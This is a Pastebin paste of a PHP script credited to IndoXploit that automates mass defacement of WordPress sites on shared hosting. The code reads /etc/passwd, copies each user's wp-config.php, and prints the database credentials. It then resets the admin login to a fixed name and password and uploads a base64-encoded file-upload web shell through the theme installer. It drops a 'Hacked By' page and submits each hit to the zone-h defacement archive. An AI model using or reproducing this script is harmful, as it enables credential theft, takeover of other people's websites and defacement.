API tools faq
paste
Guest User

Untitled

a guest
May 11th, 2017
259
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.98 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. //Tu5b0l3d
  3. //IndoXploit
  4. //http://indoxploit.blogspot.com/2015/10/config-and-auto-deface-in-worpdress.html
  5.  
  6. error_reporting(0);
  7.  
  8. cover("IndoXploit");
  9.  
  10. function save($data){
  11. $fp = @fopen("IndoXploit.htm", "a") or die("cant open file");
  12. fwrite($fp, $data);
  13. fclose($fp);
  14. }
  15.  
  16. function anucurl($sites){
  17. $ch1 = curl_init ("$sites");
  18. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  19. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
  20. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  21. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
  22. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  23. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
  24. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
  25. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
  26. $data = curl_exec ($ch1);
  27. return $data;
  28. }
  29.  
  30. function lohgin($cek, $web, $userr, $pass){
  31. $post = array(
  32. "log" => "$userr",
  33. "pwd" => "$pass",
  34. "rememberme" => "forever",
  35. "wp-submit" => "Log In",
  36. "redirect_to" => "$web/wp-admin/",
  37. "testcookie" => "1",
  38. );
  39. $ch = curl_init ("$cek");
  40. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  41. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  42. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  43. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  44. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  45. curl_setopt ($ch, CURLOPT_POST, 1);
  46. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  47. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  48. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  49. $data6 = curl_exec ($ch);
  50. return $data6;
  51. }
  52.  
  53. function cover($indoXploit){
  54. echo "<center><font size='5px'> Created By: $indoXploit</font><br>";
  55. echo "hasil bisa dilihat di <a href='IndoXploit.htm' style='text-decoration: none'>IndoXploit.htm</a></center><br><br><br>";
  56. }
  57.  
  58. function ambilKata($param, $kata1, $kata2){
  59. if(strpos($param, $kata1) === FALSE) return FALSE;
  60. if(strpos($param, $kata2) === FALSE) return FALSE;
  61. $start = strpos($param, $kata1) + strlen($kata1);
  62. $end = strpos($param, $kata2, $start);
  63. $return = substr($param, $start, $end - $start);
  64. return $return;
  65. }
  66.  
  67.  
  68. $a = file_get_contents('/etc/passwd');
  69. preg_match_all('/(.*?):x:/', $a, $data);
  70. foreach($data[1] as $user){
  71. $baca = file_get_contents("/home/$user/public_html/wp-config.php");
  72.  
  73. /* symlink('/home/'.$user.'/public_html/wp-config.php',$user.'- config.txt'); */
  74.  
  75. if($baca!=""){
  76.  
  77.  
  78. /* $b = `cp /home/$user/public_html/index.php $user-index.txt`; */
  79.  
  80. $file1 = "$user-config.txt";
  81. $fp2 = fopen($file1,"w");
  82. fputs($fp2,$baca);
  83.  
  84. $file = @file_get_contents($file1);
  85.  
  86.  
  87. echo $user."-> sukses<br>";
  88. $host = ambilkata($file,"DB_HOST', '","'");
  89. $username = ambilkata($file,"DB_USER', '","'");
  90. $password = ambilkata($file,"DB_PASSWORD', '","'");
  91. $db = ambilkata($file,"DB_NAME', '","'");
  92. $dbprefix = ambilkata($file,"table_prefix = '","'");
  93. $user_baru = "Tu5b0l3d";
  94. $password_baru = "Tu5b0l3d";
  95. $prefix = $db.".".$dbprefix."users";
  96. $sue = $db.".".$dbprefix."options";
  97. $pass = md5("$password_baru");
  98. $nick = "Hacked By Zedan-Mrx"; //must "hacked"
  99.  
  100. echo "# Db Host: $host<br>";
  101. echo "# Db user: $username<br>";
  102. echo "# Db Password: $password<br>";
  103. echo "# Db name: $db<br>";
  104. echo "# Table_Prefix: $dbprefix<br>";
  105.  
  106. mysql_connect($host,$username,$password);
  107.  
  108. mysql_select_db($db);
  109.  
  110. $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  111. $r=mysql_fetch_array($tampil);
  112. $id = $r[ID];
  113.  
  114. $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
  115. $r2=mysql_fetch_array($tampil2);
  116. $target = $r2[option_value];
  117. echo "# $target<br>";
  118.  
  119.  
  120. mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
  121.  
  122. $site= "$target/wp-login.php";
  123. $site2= "$target/wp-admin/theme-install.php?upload";
  124. $a = lohgin($site, $target, $user_baru, $password_baru);
  125. $b = lohgin($site2, $target, $user_baru, $password_baru);
  126.  
  127.  
  128. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  129. echo "# token -> $anu2<br>";
  130.  
  131.  
  132. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  133.  
  134. $www = "m.php";
  135. $fp5 = fopen($www,"w");
  136. fputs($fp5,$upload3);
  137.  
  138. $c = file_get_contents($w);
  139.  
  140. $post2 = array(
  141. "_wpnonce" => "$anu2",
  142. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  143. "themezip" => "@m.php",
  144. "install-theme-submit" => "Install Now",
  145. );
  146. $ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
  147. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  148. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  149. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  150. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  151. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  152. curl_setopt ($ch, CURLOPT_POST, 1);
  153. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
  154. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  155. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  156. $data3 = curl_exec ($ch);
  157.  
  158. $namafile = "wew.php";
  159. $fp2 = fopen($namafile,"w");
  160. fputs($fp2,$nick);
  161.  
  162. $y = date("Y");
  163. $m = date("m");
  164.  
  165.  
  166. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
  167. curl_setopt($ch6, CURLOPT_POST, true);
  168. curl_setopt($ch6, CURLOPT_POSTFIELDS,
  169. array('file3'=>"@$namafile"));
  170. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  171. curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
  172. $postResult = curl_exec($ch6);
  173. curl_close($ch6);
  174.  
  175. $as = "$target/k.php";
  176. $bs = file_get_contents($as);
  177. if(preg_match("#hacked#si",$bs)){
  178. echo "# <font color='green'>berhasil mepes...</font><br>";
  179. echo "# $as<br>";
  180. save($as."<br>");
  181. echo "# zone-h: ";
  182. $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  183. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  184. curl_setopt ($ch3, CURLOPT_POST, 1);
  185. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=Zedan-Mrx&domain1=$as&hackmode=1&reason=1");
  186.  
  187. if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
  188. echo " Ok <br><br>";
  189. }else{
  190. echo " No <br><br>";}
  191. }
  192. else{
  193. echo "# <font color='red'>gagal mepes...</font><br>";
  194. echo "# coba aja manual: <br>";
  195. echo "# $target/wp-login.php<br>";
  196. echo "# username: $user_baru<br>";
  197. echo "# password: $password_baru<br><br><br>";
  198.  
  199.  
  200. }
  201. }
  202. else{
  203. echo "$user <= No<br>";
  204. }
  205.  
  206.  
  207.  
  208. }
  209.  
  210.  
  211. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!